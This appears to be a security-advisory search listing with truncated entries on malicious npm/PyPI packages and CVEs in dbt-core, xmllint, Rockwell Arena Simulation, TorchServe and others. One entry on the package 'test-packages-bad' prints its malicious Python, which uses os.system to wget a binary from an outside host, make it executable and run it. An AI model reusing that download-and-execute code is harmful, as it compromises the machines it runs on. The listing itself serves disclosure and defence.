Malicious Package

Overview chime-core-utils is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

CVE-2025-6170

A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare...

CVE-2024-40637

dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...

Code Injection

dbtcore is vulnerable to Code Injection. The vulnerability is due to the ability of packages to override macros, materializations, and other core components of dbt, which can allow attackers to inject harmful code...

CVE-2024-40637

dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...

PYSEC-2024-66

dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...

CVE-2024-40637

CVE-2024-40637 affects dbt-core where installing a package can override macros, materializations, and other core components, potentially allowing malicious packages to inject harmful code. Root cause: implicit override of built-in materializations from installed packages. Impact is described as h...

CVE-2024-40637 Implicit override for built-in materializations from installed packages in dbt-core

dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...

CVE-2024-40637 Implicit override for built-in materializations from installed packages in dbt-core

dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...

CVE-2024-2929

Summary: CVE-2024-2929 concerns Rockwell Automation Arena Simulation software with memory corruption flaws due to buffer-related issues that can lead to unauthorized code execution if a user opens a malicious file. The vulnerability family includes multiple memory-corruption variants (out-of-boun...

CVE-2024-21919 Rockwell Automation Arena Simulation Vulnerable To Uninitialized Pointer

An uninitialized pointer in Rockwell Automation Arena Simulation software could potentially allow a malicious user to insert unauthorized code to the software by leveraging the pointer after it is properly. Once inside, the threat actor can run harmful code on the system. This affects the...

CVE-2024-21919

The CVE-2024-21919 entry concerns Rockwell Automation Arena Simulation Software with an uninitialized pointer access vulnerability. Affected product: Arena Simulation Software (version 16.00 listed; later patch 16.20.03 is recommended). Root cause: uninitialized pointer accessible during operatio...

CVE-2024-21913

Summary: Rockwell Automation Arena Simulation Software is affected by a heap-based memory buffer overflow vulnerability (CWE-122) that can allow a malicious user to run arbitrary code by overstepping memory boundaries, triggered by opening a malicious file. Affected product: Arena Simulation Soft...

CVE-2024-21912 Rockwell Automation Arena Simulation vulnerable to out of bounds write

An arbitrary code execution vulnerability in Rockwell Automation Arena Simulation could let a malicious user insert unauthorized code into the software. This is done by writing beyond the designated memory area, which causes an access violation. Once inside, the threat actor can run harmful code ...

GHSA-M2MJ-PR4F-H9JP TorchServe ZipSlip

Impact Using the model/workflow management API, there is a chance of uploading potentially harmful archives that contain files that are extracted to any location on the filesystem that is within the process permissions. Leveraging this issue could aid third-party actors in hiding harmful code in...

Multiple Self-XSS Vulnerabilites

Description Multiple Self-XSS Vulnerabilities are triggered at multiple endpoints. http://localhost:8083/edit/server/ There is a bug in web/templates/pages/editserver.php file. Attacker can control $vtimezone. php ', theme: '', language: '', hasSmtpRelay: , remoteBackupEnabled: , backupType: '',...

Malicious code in as-ui-deals (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 59a46a45592f6c5043e6aa80e3fca0f987b6fad0cd0078499ea75823075847c1 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Potential SHA256 Digest Vulnerability in Solidity Contract

Lines of code Vulnerability details Impact This vulnerability enables the hacker to pass malicious data to the "verify" function, which in turn uses the said data as input for the sha256 function, this can lead to unexpected or incorrect output, potentially resulting in unauthorized access to...

Malicious Package

Overview test-packages-bad is a malicious package. This package downloads and runs malicious code on the victim host. Malicious Code python import os os.system"wget https://dark.devsecwise.com/cronjob.out /dev/null 2&1" os.system"chmod +x /home/$he/.metasploit/cronjob.out" os.system"./cronjob.out...

CVE-2021-40336

A vulnerability exists in the http web interface where the web interface does not validate data in an HTTP header. This causes a possible HTTP response splitting, which if exploited could lead an attacker to channel down harmful code into the user’s web browser, such as to steal the session...